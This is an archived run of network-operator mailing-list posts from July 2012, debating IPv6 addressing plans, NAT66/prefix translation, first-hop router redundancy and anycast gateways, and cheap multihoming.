From matt.addison at lists.evilgeni.us Mon Jul 16 22:38:55 2012
From: matt.addison at lists.evilgeni.us (Matt Addison)
Date: Mon, 16 Jul 2012 23:38:55 -0400
Subject: using "reserved" IPv6 space
In-Reply-To: <2059648.BTFFAkdkz4@lsdsrv>
References: <2059648.BTFFAkdkz4@lsdsrv>
Message-ID: <4742592599634568524@unknownmsgid>

On Jul 16, 2012, at 15:40, Oliver wrote:
> Additionally, as an alternative to RAs, you can simply point default at the
> all-routers anycast address.

Wouldn't this result in duplicate packets leaving your network if there
were more than 1 router listening to 'all routers' and you (at the MAC
layer) multicasted to those listeners?

From virendra.rode at gmail.com Mon Jul 16 23:11:49 2012
From: virendra.rode at gmail.com (virendra rode)
Date: Mon, 16 Jul 2012 21:11:49 -0700
Subject: St Louis Internet Exchange
In-Reply-To:
References:
Message-ID: <5004E605.4060509@gmail.com>

Hi,

On 07/16/2012 07:36 PM, Bill Woodcock wrote:
>
> On Jul 16, 2012, at 3:23 PM, Jay Hanke wrote:
>
>> After a bit of googling, I found some references to an Internet
>> Exchange in St. Louis, MO called the St. Louis Regional
>> Exchange. Is this project still active?
>
> It appears to be dead. The web site redirects to a commercial
> colo, and the last few ISPs appear to have departed at the end of
> 2008, after about two years of activity.
>
> https://prefix.pch.net/applications/ixpdir/detail.php?exchange_point_id=350
>
> If anyone has any better information, please let us know.
>
> -Bill
--------------------
IXP DBs are coming out empty. I understand these DBs are best effort but
what I like about PCH that it tends to never drop an exchange from the
list and instead marks it as "defunct" or "down" by performing some sort
of validation which Bill could confirm.
In addition to IXP DBs, IRR, LGs & bgp tables (route view & ripe ris)
shows no sign either.

regards,
/virendra

From owen at delong.com Mon Jul 16 23:11:18 2012
From: owen at delong.com (Owen DeLong)
Date: Mon, 16 Jul 2012 21:11:18 -0700
Subject: using "reserved" IPv6 space
In-Reply-To: <2059648.BTFFAkdkz4@lsdsrv>
References: <2059648.BTFFAkdkz4@lsdsrv>
Message-ID:

On Jul 16, 2012, at 12:39 PM, Oliver wrote:

> On Monday 16 July 2012 18:26:08 Rajendra Chayapathi wrote:
>> On the HSRP/ND part , this all falls in the First Hop redundancy arena
>> and can be achieved via any of the following and each has its merits and
>> cons..
>>
>> 1) Using ND -- need to tune the "IPv6 nd reachable time" to achieve the
>> faster failover
>> 2) Using any of the First hop redundancy protocol ( HSRP, VRRP , GLBP)
>> 3) Default route selection.
>>
>
> In all honesty, I think using ND as the failover method is a generally bad
> idea - you have no way of ensuring all endpoints take note of or honour the
> router preference flag.

Huh? Any host which doesn't is provably buggy. I'm not saying it can't or
won't happen, but, seriously? If the host is that buggy, you can't count
on it using the fake MAC either.

> Additionally, having a 1 second validity lifetime is going to create a lot of
> ICMPv6 spam across the segment - big deal? perhaps not. But when contrasted
> with the fact that it can be wholly avoided using one of the aforementioned
> redundancy protocols, why would you do it?

You don't need a 1 second valid timer (that would be absurd).
You need a 1 second keep alive (if you really care about 1 second fast
fall-over) and you're going to get just as much SPAM with sub-second
fallover from any of the other solutions as well. They all send multicast
packets.

> Additionally, as an alternative to RAs, you can simply point default at the
> all-routers anycast address.

The disadvantage to this is the high probability of packet duplication.
For someone worried about ICMP spam on the subnet, I'm surprised you're
not worried about what happens when 2 or more routers copy the same packet
and route both copies on to the end destination. (Lather, rinse, repeat
said duplication for any upstream segments using such tactics as well).

Owen

From mysidia at gmail.com Mon Jul 16 23:18:37 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Mon, 16 Jul 2012 23:18:37 -0500
Subject: using "reserved" IPv6 space
In-Reply-To: <50042F34.5080007@gmail.com>
References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com>
Message-ID:

On 7/16/12, -Hammer- wrote:
> hurdles. Example? HSRP IPv6 global addressing on Cisco ASR platform. If

HSRP is a legacy proprietary protocol; try VRRP.
Stateless autoconfig and router advertisements can obviate
(eliminate/reduce) the need in many cases; albeit, with a longer failure
recovery duration.

> this morning from CheckPoint for NAT66. This should have been ready for
> prime time years ago. I guess the vendors weren't getting the push from

NAT66; you're talking about something that is not a mainline feature, an
experimental proposition; RFC6296 produced in 2011.

Very few IPv6 deployments should require prefix translation or any kind
of NAT technology with IPv6, other than the IPv4 transition technologies.

So... NO.. they should not have had this ready "for prime time" years ago.
There are other things they should have been working on, such as getting
the base IPv6 implementation correct, V6 connectivity, V6-enabled
protocols, support for the newer RA/DHCPv6 options, and support for the
newer more fully baked IPv4 transition specs such as 6to4, NAT-PT, and
bugfixing.

I'll take the stable platform, that has the standards-specified features,
over one with bells and whistles, and the latest experimental draft
features such as 6to6, that are not required to deploy IPv6, thanks.

--
-JH

From owen at delong.com Mon Jul 16 23:23:46 2012
From: owen at delong.com (Owen DeLong)
Date: Mon, 16 Jul 2012 21:23:46 -0700
Subject: NAT66 was Re: using "reserved" IPv6 space
In-Reply-To:
References:
Message-ID: <4F2FCE9C-7014-4E95-90FC-3C3107999ED3@delong.com>

On Jul 16, 2012, at 6:55 PM, Lee wrote:

> On 7/16/12, Owen DeLong wrote:
>>
>> Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is being
>> able to eliminate NAT. NAT was a necessary evil for IPv4 address
>> conservation. It has no good use in IPv6.
>
> NAT is good for getting the return traffic to the right firewall.  How
> else do you deal with multiple firewalls & asymmetric routing?

1. Share state across the firewalls or go with stateless firewalls.
2. Move the firewalls close enough to the end hosts to avoid this problem.
   Keep the asymmetric routing outside the perimeter.
3. Very creative source address selection mechanisms.
4. LISP (if you must).

>
> Yes, it's possible to get traffic back to the right place without NAT.
> But is it as easy as just NATing the outbound traffic at the
> firewall?

That depends on whose life you are trying to make easy. If you asked the
application developers or the people that have to build all the
problematic ALGs that creates a need for, I'd bet they would have a
different opinion than the guy configuring the firewall.
In terms of overall problems created, cost to the community, increased
insecurity, and the other costs associated with a NAT-based solution, I'd
say that it is a net loss to use NAT and a net gain to avoid it.

From the perspective of the firewall administrator alone without a broader
view of the total consequences, toxic pollution of the internet seems like
a good idea.

Owen

From owen at delong.com Mon Jul 16 23:28:18 2012
From: owen at delong.com (Owen DeLong)
Date: Mon, 16 Jul 2012 21:28:18 -0700
Subject: using "reserved" IPv6 space
In-Reply-To: <1342492536.6281.149.camel@karl>
References: <20120716035812.87659.qmail@joyce.lan> <1342492536.6281.149.camel@karl>
Message-ID:

On Jul 16, 2012, at 7:35 PM, Karl Auer wrote:

> On Mon, 2012-07-16 at 22:04 -0400, Lee wrote:
>> Each site gets a /48.  Even the ones with less than 200 people.
>> [...]
>> Which is *boring*.  Nothing novel, no breaking out of "IPv4 think"
>> aside from massively wasting address space.
>
> It's only a waste if you get nothing for it. By using /64 everywhere you
> get a more homogeneous network, easier to administer, manage, document,
> maintain... There are similar advantages, writ larger, to using /48 for
> every site.
>

It's also a waste if you don't ever use the address and the protocol gets
deprecated before a significant percentage of the addresses are allocated.
Earlier in this thread, I did the math showing how it will likely, even
with very liberal allocation policies, be 100 years or more before we
allocate 1/40th of the total IPv6 space to RIRs.

> Whether you have 2, 20, 200, 2000 or 20,000 hosts in a /64 subnet, you
> have still only used 0% of it, to a dozen or more decimal places.
> IPv4-think says that's a waste. IPv6-think says "great - all my subnets
> are large enough". Resizing IPv4 subnets is common; resizing IPv6
> subnets will be rare.
>
> IPv4-think is conserving addresses. IPv6-think is conserving subnets.
> We
> don't buy dining chairs based on the number of atoms in them - we buy
> enough to seat the people who need seating.
>

Exactly.

Owen

From owen at delong.com Mon Jul 16 23:26:00 2012
From: owen at delong.com (Owen DeLong)
Date: Mon, 16 Jul 2012 21:26:00 -0700
Subject: using "reserved" IPv6 space
In-Reply-To:
References: <20120716035812.87659.qmail@joyce.lan>
Message-ID:

You could try this:

If you give a /48 to each site, then assign the sites primary and backup
firewalls.

Aggregate the /48s into larger blocks by primary firewall.

Aggregate the primary firewall blocks into larger backup firewall
aggregates.

Advertise the firewall-specific aggregates and the less specific
backup-firewall set aggregates.

Owen

On Jul 16, 2012, at 7:04 PM, Lee wrote:

> On 7/15/12, John Levine wrote:
>>> I feel like I should be able to do something really nice with an
>>> absurdly large address space. But lack of imagination or whatever.. I
>>> haven't come up with anything that really appeals to me.
>>
>> Use a fresh IP for every HTTP request, email message, and IM. Just think of
>> how well you can do error management.
>
> hrmm... nope, can't think of a single thing.  Then again, I'm on the
> routing & switching team at work, so things like HTTP requests, email
> messages, and IM are just different types of user traffic that needs
> to be routed to me.
>
> Recall the message I was responding to:
>
>>>> There is a HUGE difference between IPv4 and IPv6 thinking. We've all
>>>> been living in an austerity regime for so long that we've completely
>>>> forgotten how to leave parsimony behind. Even those of us who worked
>>>> at companies that were summarily handed a Class B when we mumbled
>>>> something about "internal subnetting" have a really hard time
>>>> remembering how to act when we suddenly don't have to answer for every
>>>> single host address and can design a network to conserve other things
>>>> (like our brain cells).
>
> I read it as design a network >>addressing scheme<< to conserve other
> things & was hoping someone could share new ways of looking at it.  I
> feel like I'm stuck in "IPv4 think" with an addressing plan that's
> basically
>
> Each site gets a /48.  Even the ones with less than 200 people.
> Each subnet is assigned a /64 except for loopbacks & p2p subnets.
> First 256 subnets in each /48 are reserved for things like loopback
> addresses, p2p links, switch management subnets, etc.
> High order 4 bits of the site address are used for the subnet type.
> So a /52 tells you the site and if it's users, printers, servers, IP
> phones, or whatever.
>
> Which is *boring*.  Nothing novel, no breaking out of "IPv4 think"
> aside from massively wasting address space.  Which brings me back
> around to my original request for suggestions.  What's the new way of
> looking at designing a network addressing scheme?
>
> Regards,
> Lee

From owen at delong.com Mon Jul 16 23:31:42 2012
From: owen at delong.com (Owen DeLong)
Date: Mon, 16 Jul 2012 21:31:42 -0700
Subject: NAT66 was Re: using "reserved" IPv6 space
In-Reply-To:
References: <20120717024040.7A074228E3B4@drugs.dv.isc.org>
Message-ID:

Think HA pairs in Pittsburgh, Dallas, and San Jose.

Now imagine each has different upstream connectivity and the backbone
network connecting all the corporate sites lives inside those firewalls.

The real solution to this is to move the backbone outside of the firewalls
and connect the internal networks via VPNS that ride the external backbone
and can be routed over the internet safely when a backbone link fails.

However, this still requires some interesting effort in terms of source
address selection, routing, etc. in order to avoid triangle routing out of
the firewall in Pittsburgh resulting in a return trying to come in via
Dallas or San Jose.
I think in IPv6, as firewall vendors begin to mature their products, we'll
either see a departure from stateful inspection, or, more likely an ability
to set up HA clusters across diverse geography where state tables are kept
in sync across the WAN.

Owen

On Jul 16, 2012, at 7:56 PM, Grant Ridder wrote:

> If you are running an HA pair, why would you care which box it went back
> through?
>
> -Grant
>
> On Monday, July 16, 2012, Mark Andrews wrote:
>
>>
>> In message squUmZofs3_-yriHY8o4Gt3W9+x6fVUQ at mail.gmail.com >, Lee
>> writes:
>>> On 7/16/12, Owen DeLong > wrote:
>>>>
>>>> Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is
>> being
>>>> able to eliminate NAT. NAT was a necessary evil for IPv4 address
>>>> conservation. It has no good use in IPv6.
>>>
>>> NAT is good for getting the return traffic to the right firewall.  How
>>> else do you deal with multiple firewalls & asymmetric routing?
>>
>> Traffic goes where the routing protocols direct it.  NAT doesn't
>> help this and may actually hinder as the source address cannot be
>> used internally to direct traffic to the correct egress point.
>>
>> Instead you need internal routers that have to try to track traffic
>> flows rather than making simple decisions based on source and
>> destination addresses.
>>
>> Applications that use multiple connections may not always end up
>> with consistent external source addresses.
>>
>>> Yes, it's possible to get traffic back to the right place without NAT.
>>> But is it as easy as just NATing the outbound traffic at the
>>> firewall?
>>
>> It can be and it can be easier to debug without NAT mangling
>> addresses.
>>
>> The only thing helpful NAT66 does is delay the externally visible
>> source address selection until the packet passes the NAT66 box.
>>
>> Mark
>> --
>> Mark Andrews, ISC
>> 1 Seymour St., Dundas Valley, NSW 2117, Australia
>> PHONE: +61 2 9871 4742                 INTERNET: marka at isc.org
>>
>>

From kauer at biplane.com.au Mon Jul 16 23:40:58 2012
From: kauer at biplane.com.au (Karl Auer)
Date: Tue, 17 Jul 2012 14:40:58 +1000
Subject: using "reserved" IPv6 space
In-Reply-To: <4742592599634568524@unknownmsgid>
References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid>
Message-ID: <1342500058.6281.154.camel@karl>

On Mon, 2012-07-16 at 23:38 -0400, Matt Addison wrote:
> Oliver wrote:
> > Additionally, as an alternative to RAs, you can simply point default
> > at the all-routers anycast address.
>
> Wouldn't this result in duplicate packets leaving your network if
> there were more than 1 router listening to 'all routers' and you (at
> the MAC layer) multicasted to those listeners?

I think Oliver meant the subnet router anycast address.

Anycast gets you to one-of-many. The routers work out which of them is
currently getting the subnet router anycast traffic. If that router drops
out for any reason, another of the routers available on the link takes
over.

Regards, K.

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)                   http://www.biplane.com.au/kauer
GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017
Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687
From mysidia at gmail.com Tue Jul 17 00:10:50 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Tue, 17 Jul 2012 00:10:50 -0500
Subject: using "reserved" IPv6 space
In-Reply-To: <1342500058.6281.154.camel@karl>
References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl>
Message-ID:

On 7/16/12, Karl Auer wrote:
> I think Oliver meant the subnet router anycast address.
> Anycast gets you to one-of-many. The routers work out which of them is

Just to reaffirm that.  RFC 4291 states packets sent to the subnet-router
anycast will be delivered to one router on the subnet.

That's fine for traffic with a destination IP of the anycast address;
they'll land on one of the routers, and perhaps one of the routers will
respond.

But what about packets with a destination address on another network and
trying to use the anycast address as a 'gateway'?  The destination IP in
the IP packet header of the forwarded packet won't be the anycast address;
the last known hardware address for the IP, if it's unicast, may be down,
so it's probably nonsensical to enter an anycast address as default
gateway, unless using the subnet anycast address as a router/gateway has
special behavior defined elsewhere?

RFC 4291 S2.6.1  http://tools.ietf.org/html/rfc4291
"
   Packets sent to the Subnet-Router anycast address will be delivered to
   one router on the subnet.  All routers are required to support the
   Subnet-Router anycast addresses for the subnets to which they have
   interfaces.
"

--
-JH

From valdis.kletnieks at vt.edu Tue Jul 17 00:20:35 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Tue, 17 Jul 2012 01:20:35 -0400
Subject: NAT66 was Re: using "reserved" IPv6 space
In-Reply-To: Your message of "Mon, 16 Jul 2012 21:31:42 -0700."
References: <20120717024040.7A074228E3B4@drugs.dv.isc.org>
Message-ID: <97150.1342502435@turing-police.cc.vt.edu>

On Mon, 16 Jul 2012 21:31:42 -0700, Owen DeLong said:
> Think HA pairs in Pittsburgh, Dallas, and San Jose.
>
> Now imagine each has different upstream connectivity and the backbone
> network connecting all the corporate sites lives inside those firewalls.
>
> The real solution to this is to move the backbone outside of the firewalls
> and connect the internal networks via VPNS that ride the external backbone
> and can be routed over the internet safely when a backbone link fails.

Wouldn't this be even easier if you gave each machine involved multiple
addresses, one ULA and one external?  This isn't IPv4 anymore, you can
stick multiple addresses on an interface. :)

From kauer at biplane.com.au Tue Jul 17 00:29:06 2012
From: kauer at biplane.com.au (Karl Auer)
Date: Tue, 17 Jul 2012 15:29:06 +1000
Subject: using "reserved" IPv6 space
In-Reply-To:
References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl>
Message-ID: <1342502946.6281.164.camel@karl>

On Tue, 2012-07-17 at 00:10 -0500, Jimmy Hess wrote:
> Just to reaffirm that.  RFC 4291 states packets sent to the
> subnet-router anycast will be delivered to one router on the subnet.
> [...]
> But what about packets with a destination address on another network
> and trying to use the anycast address as a 'gateway'?  The
> destination IP in the IP packet header of the forwarded packet won't
> be the anycast address; the last known hardware address for the IP,
> if it's unicast, may be down, so it's probably nonsensical to enter
> an anycast address as default gateway, unless using the subnet
> anycast address as a router/gateway has special behavior defined
> elsewhere?
I'm not sure I follow the logic there. If the anycast router changes the
packet will be resent to the new subnet anycast router eventually
(assuming some layer cares enough about the packet to resend it). The
"last known hardware address" doesn't matter any more or less in this
scenario than it does in any other routing situation.

Regards, K.

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)                   http://www.biplane.com.au/kauer
GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017
Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687

From seth.mos at dds.nl Tue Jul 17 00:36:30 2012
From: seth.mos at dds.nl (Seth Mos)
Date: Tue, 17 Jul 2012 07:36:30 +0200
Subject: using "reserved" IPv6 space
In-Reply-To: <161620.1342456488@turing-police.cc.vt.edu>
References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> <161620.1342456488@turing-police.cc.vt.edu>
Message-ID: <75C9CAAC-9162-4F1F-9E51-A7801FC3F1C8@dds.nl>

Hi,

On 16 Jul 2012, at 18:34, valdis.kletnieks at vt.edu wrote:

> On Mon, 16 Jul 2012 11:09:28 -0500, -Hammer- said:
>> -------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be there
>> if there weren't enough customers asking for it. Are all the customers naive?
>> I doubt it. They have their reasons. I agree with your "purist" definition and
>> did not say I was using it. My point is that vendors are still rolling out base
>> line features even today.
>
> Sorry to tell you this, but the customers *are* naive and asking for stupid
> stuff.
> They think they need NAT under IPv6 because they suffered with it in
> IPv4 due to addressing issues or a (totally perceived) security benefit (said
> benefit being *entirely* based on the fact that once you get NAT working, you
> can build a stateful firewall for essentially free). The address crunch is
> gone, and stateful firewalls exist, so there's no *real* reason to keep
> pounding your head against the wall other than "we've been doing it for 15
> years".

To highlight what the current NAT66 is useful for, it's an RFC for Network Prefix Translation. It has nothing to do with obfuscation or hiding the network anymore. Its current application is multihoming for the poor.

Example:
You have a Cable and a DSL, they both provide IPv6 and you want to provide failover. You then use ULA or one of the Global Addresses on the LAN network, and set up NAT66 mappings for the secondary WAN, or both if you are using ULA.

This will not hide *anything* as your machines will now be *visible* on 2 global prefixes at the same time. And yes, you still use the stateful firewall rules on each WAN for the incoming traffic. And you can redirect traffic as needed out each WAN. It's the closest thing to the existing Dual WAN that current routers support.

Also note that this also works fine with 2 IPv6 tunnels. Bind each tunnel to a WAN and you have the same failover for IPv6 as IPv4.

Cheers,
Seth

From seth.mos at dds.nl Tue Jul 17 00:47:30 2012
From: seth.mos at dds.nl (Seth Mos)
Date: Tue, 17 Jul 2012 07:47:30 +0200
Subject: NAT66 was Re: using "reserved" IPv6 space
In-Reply-To:
References: <20120717024040.7A074228E3B4@drugs.dv.isc.org>
Message-ID:

On 17 Jul 2012, at 04:56, Grant Ridder wrote:

> If you are running an HA pair, why would you care which box it went back
> through?

Because it could be/is a stateful firewall and the backup will drop the traffic.
(FreeBSD CARP)

Cheers,
Seth

>
> -Grant
>
> On Monday, July 16, 2012, Mark Andrews wrote:
>
>>
>> In message > squUmZofs3_-yriHY8o4Gt3W9+x6fVUQ at mail.gmail.com >, Lee
>> writes:
>>> On 7/16/12, Owen DeLong > wrote:
>>>>
>>>> Why would you want NAT66? ICK!!! One of the best benefits of IPv6 is
>> being
>>>> able to eliminate NAT. NAT was a necessary evil for IPv4 address
>>>> conservation. It has no good use in IPv6.
>>>
>>> NAT is good for getting the return traffic to the right firewall. How
>>> else do you deal with multiple firewalls & asymmetric routing?
>>
>> Traffic goes where the routing protocols direct it. NAT doesn't
>> help this and may actually hinder as the source address cannot be
>> used internally to direct traffic to the correct egress point.
>>
>> Instead you need internal routers that have to try to track traffic
>> flows rather than making simple decisions based on source and
>> destination addresses.
>>
>> Applications that use multiple connections may not always end up
>> with consistent external source addresses.
>>
>>> Yes, it's possible to get traffic back to the right place without NAT.
>>> But is it as easy as just NATing the outbound traffic at the
>>> firewall?
>>
>> It can be and it can be easier to debug without NAT mangling
>> addresses.
>>
>> The only thing helpful NAT66 does is delay the externally visible
>> source address selection until the packet passes the NAT66 box.
>>
>> Mark
>> --
>> Mark Andrews, ISC
>> 1 Seymour St., Dundas Valley, NSW 2117, Australia
>> PHONE: +61 2 9871 4742 INTERNET: marka at isc.org
>>
>>

From mysidia at gmail.com Tue Jul 17 01:16:32 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Tue, 17 Jul 2012 01:16:32 -0500
Subject: using "reserved" IPv6 space
In-Reply-To: <1342502946.6281.164.camel@karl>
References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <1342502946.6281.164.camel@karl>
Message-ID:

On 7/17/12, Karl Auer wrote:
[snip]
> I'm not sure I follow the logic there. If the anycast router changes the
> packet will be resent to the new subnet anycast router eventually
> (assuming some layer cares enough about the packet to resend it). The
> "last known hardware address" doesn't matter any more or less in this
> scenario than it does in any other routing situation.

The pertinent discussion is not about "any other routing situation"; it's about first hop redundancy.

The "last known hardware address" is in the NDP table, so the packet retransmissions likely wind up in the same place.

Another problem is the subnet anycast address may find unwanted routers that have to listen on it, including routers with only one interface and incomplete routing info, and including some unauthorized 5-port IPv6 router someone smuggled into the building and plugged in somewhere.

By contrast, a real FHRP that implements failover either uses a virtual hardware address, or a 'gratuitous arp' type mechanism, so the packet retransmissions will go to the live failover partner.
-- -JH From owen at delong.com Tue Jul 17 01:36:54 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 23:36:54 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <1342500058.6281.154.camel@karl> References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> Message-ID: <894EB7FC-A18C-41BA-A778-85564632FC8E@delong.com> On Jul 16, 2012, at 9:40 PM, Karl Auer wrote: > On Mon, 2012-07-16 at 23:38 -0400, Matt Addison wrote: >> Oliver wrote: >>> Additionally, as an alternative to RAs, you can simply point default >>> at the all-routers anycast address. >> >> Wouldn't this result in duplicate packets leaving your network if >> there were more than 1 router listening to 'all routers' and you (at >> the MAC layer) multicasted to those listeners? > > I think Oliver meant the subnet router anycast address. > > Anycast gets you to one-of-many. The routers work out which of them is > currently getting the subnet router anycast traffic. If that router > drops out for any reason, another of the routers available on the link > takes over. > Reread the spec... It gets the packet to one or more of the routers and it may well lead to packet duplication. There may or may not be coordination between the routers. It isn't in the spec. 
Owen

From owen at delong.com Tue Jul 17 01:43:05 2012
From: owen at delong.com (Owen DeLong)
Date: Mon, 16 Jul 2012 23:43:05 -0700
Subject: using "reserved" IPv6 space
In-Reply-To: <75C9CAAC-9162-4F1F-9E51-A7801FC3F1C8@dds.nl>
References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> <161620.1342456488@turing-police.cc.vt.edu> <75C9CAAC-9162-4F1F-9E51-A7801FC3F1C8@dds.nl>
Message-ID:

On Jul 16, 2012, at 10:36 PM, Seth Mos wrote:

> Hi,
>
> On 16 Jul 2012, at 18:34, valdis.kletnieks at vt.edu wrote:
>
>> On Mon, 16 Jul 2012 11:09:28 -0500, -Hammer- said:
>>> -------That is clearly a matter of opinion. NAT64 and NAT66 wouldn't be there
>>> if there weren't enough customers asking for it. Are all the customers naive?
>>> I doubt it. They have their reasons. I agree with your "purist" definition and
>>> did not say I was using it. My point is that vendors are still rolling out base
>>> line features even today.
>>
>> Sorry to tell you this, but the customers *are* naive and asking for stupid
>> stuff. They think they need NAT under IPv6 because they suffered with it in
>> IPv4 due to addressing issues or a (totally perceived) security benefit (said
>> benefit being *entirely* based on the fact that once you get NAT working, you
>> can build a stateful firewall for essentially free). The address crunch is
>> gone, and stateful firewalls exist, so there's no *real* reason to keep
>> pounding your head against the wall other than "we've been doing it for 15
>> years".
>
> To highlight what the current NAT66 is useful for, it's an RFC for Network Prefix Translation. It has nothing to do with obfuscation or hiding the network anymore. Its current application is multihoming for the poor.

And it's a really poor way to do multihoming.

You don't have to spend a lot of money to multihome properly.
> > Example: > You have a Cable and a DSL, they both provide IPv6 and you want to provide failover. You then use ULA or one of the Global Addresses on the LAN network, and set up NAT66 mappings for the secondary WAN, or both if you are using ULA. I have that and I use BGP with an ARIN prefix using the Cable and DSL as layer 2 substrates for dual-stack tunnels. Works pretty well and doesn't cost much more than the NAT66 based solution. > This will not hide *anything* as your machines will now be *visible* on 2 global prefixes at the same time. And yes, you still use the stateful firewall rules on each WAN for the incoming traffic. And you can redirect traffic as needed out each WAN. It's the closest thing to the existing Dual WAN that current routers support. > > Also note that this also works fine with 2 IPv6 tunnels. Bind each tunnel to a WAN and you have the same failover for IPv6 as IPv4. Once you go to tunnels, why not go all the way and put BGP across the tunnels? Owen From owen at delong.com Tue Jul 17 01:40:11 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 23:40:11 -0700 Subject: NAT66 was Re: using "reserved" IPv6 space In-Reply-To: <97150.1342502435@turing-police.cc.vt.edu> References: <20120717024040.7A074228E3B4@drugs.dv.isc.org> <97150.1342502435@turing-police.cc.vt.edu> Message-ID: <225F3135-ABBF-490B-8DA7-02E817D6BB23@delong.com> On Jul 16, 2012, at 10:20 PM, valdis.kletnieks at vt.edu wrote: > On Mon, 16 Jul 2012 21:31:42 -0700, Owen DeLong said: >> Think HA pairs in Pittsburgh, Dallas, and San Jose. >> >> Now imagine each has different upstream connectivity and the backbone >> network connecting all the corporate sites lives inside those firewalls. >> >> The real solution to this is to move the backbone outside of the firewalls >> and connect the internal networks via VPNS that ride the external backbone >> and can be routed over the internet safely when a backbone link fails. 
> > Wouldn't this be even easier if you gave each machine involved multiple > addresses, one ULA and one external? This isn't IPv4 anymore, you can > stick multiple addresses on an interface. :) Not really... Doesn't help with the situation where you go from host->Firewall A-> web server on the external internet and the response goes web server->Firewall B-> X (Firewall B has no state table entry for the session). Owen From owen at delong.com Tue Jul 17 01:44:42 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 16 Jul 2012 23:44:42 -0700 Subject: using "reserved" IPv6 space In-Reply-To: References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <1342502946.6281.164.camel@karl> Message-ID: On Jul 16, 2012, at 11:16 PM, Jimmy Hess wrote: > On 7/17/12, Karl Auer wrote: > [snip >> I'm not sure I follow the logic there. If the anycast router changes the >> packet will be resent to the new subnet anycast router eventually >> (assuming some layer cares enough about the packet to resend it). The >> "last known hardware address" doesn't matter any more or less in this >> scenario than it does in any other routing situation. > > The pertinent discussion is not about "any other routing situation"; > it's about first hop redundancy. > > The "last known hardware address" is in the NDP table, so the packet > retransmissions likely wind up in the same place NUD should actually take care of that. > Another problem is the subnet anycast address may find unwanted > routers that have to listen on it, including routers with only one > interface and incomplete routing info, and including some > unauthorized 5-port IPv6 router someone smuggled into the > building and plugged in somewhere. Yep. > By contrast, a real FHRP that implements failover either uses a > virtual hardware address, or a 'gratuitous arp' type mechanism, so > the packet retransmissions will go to the live failover partner. 
The whole concept of gratuitous arp is strictly IPv4.

Owen

From kauer at biplane.com.au Tue Jul 17 01:58:16 2012
From: kauer at biplane.com.au (Karl Auer)
Date: Tue, 17 Jul 2012 16:58:16 +1000
Subject: using "reserved" IPv6 space
In-Reply-To:
References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <1342502946.6281.164.camel@karl>
Message-ID: <1342508296.6281.188.camel@karl>

On Mon, 2012-07-16 at 23:44 -0700, Owen DeLong wrote:
> The whole concept of gratuitous arp is strictly IPv4.

Isn't an unsolicited neighbour advertisement pretty much the same thing?

Regards, K.

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)
http://www.biplane.com.au/kauer
GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017
Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687

From seth.mos at dds.nl Tue Jul 17 02:08:21 2012
From: seth.mos at dds.nl (Seth Mos)
Date: Tue, 17 Jul 2012 09:08:21 +0200
Subject: using "reserved" IPv6 space
In-Reply-To:
References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <7527FD11-0748-4DDD-B12A-F83913AE34BF@delong.com> <50043CB8.20302@gmail.com> <161620.1342456488@turing-police.cc.vt.edu> <75C9CAAC-9162-4F1F-9E51-A7801FC3F1C8@dds.nl>
Message-ID: <50050F65.5020103@dds.nl>

On 17-7-2012 8:43, Owen DeLong wrote:
>
> On Jul 16, 2012, at 10:36 PM, Seth Mos wrote:
>
>> Hi,
>>
>> On 16 Jul 2012, at 18:34, valdis.kletnieks at vt.edu wrote:
>> To highlight what the current NAT66 is useful for, it's an RFC for Network Prefix Translation. It has nothing to do with obfuscation or hiding the network anymore. Its current application is multihoming for the poor.
>
> And it's a really poor way to do multihoming.
>
> You don't have to spend a lot of money to multihome properly.

Did you see I mentioned poor? Poor as in unwilling to pay anything more than the cost for the 2 internet connections they already have. If you are an individual this likely applies. 3G stick anyone? If you are a business, see B for Business and B for BGP.

Also, I hope Mobile Internet providers will be supporting DHCP6 and DHCP6-PD for hotspots. Another place where I can see cruft being made.

